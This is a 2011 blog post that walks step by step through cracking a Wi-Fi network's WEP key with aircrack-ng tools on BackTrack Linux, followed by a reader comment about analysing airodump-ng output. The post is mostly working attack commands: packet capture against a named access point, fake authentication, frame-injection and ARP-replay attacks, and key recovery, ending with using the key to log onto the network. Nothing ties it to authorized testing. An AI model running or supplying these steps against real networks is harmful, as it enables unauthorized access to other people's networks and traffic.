September 16, 2011

Crack WEP

Hardware selection

Install BackTrack Linux

Test hardware
List interfaces

Enable monitor mode
airmon-ng start wlan0

Test injection
aireplay-ng --test mon0

Assoicate with the AP
Find target AP
airodump-ng mon0

Start capture
airodump-ng -c 11 --bssid 30:46:9A:A3:7C:06 -w GOBIN mon0

Fake authentication with AP
aireplay-ng --fakeauth 0 -a 30:46:9A:A3:7C:06 mon0

Interactive frame selection attack
aireplay-ng --interactive -p 0841 -c FF:FF:FF:FF:FF:FF -a 30:46:9A:A3:7C:06 mon0

WEP-encrypted ARP request packets are typically either 68 (from a wireless client) or 86 (from a wired client) bytes.

Standard ARP-request replay attack
Use this attack only if there is an active client.

aireplay-ng --arpreplay -b 30:46:9A:A3:7C:06 mon0

aircrack-ng GOBIN-01.cap

It is usually 10000-34000 IVs to find the key. The WEP key appears next to "KEY FOUND". Drop the colons and enter it to log onto the network.


1 comment:

  1. Here I have shared my sample:-
    sometimes it is difficult to manage airodump-ng output files. i mean once i generate those csv and xml files then after i start looking into it so for large amount of data i can't figure it out. so is there any tools or services available for analysis and visualization ? i have used this website and it is quite good, here i have shared my sample data have a look and also share any other sources if anyone knows. -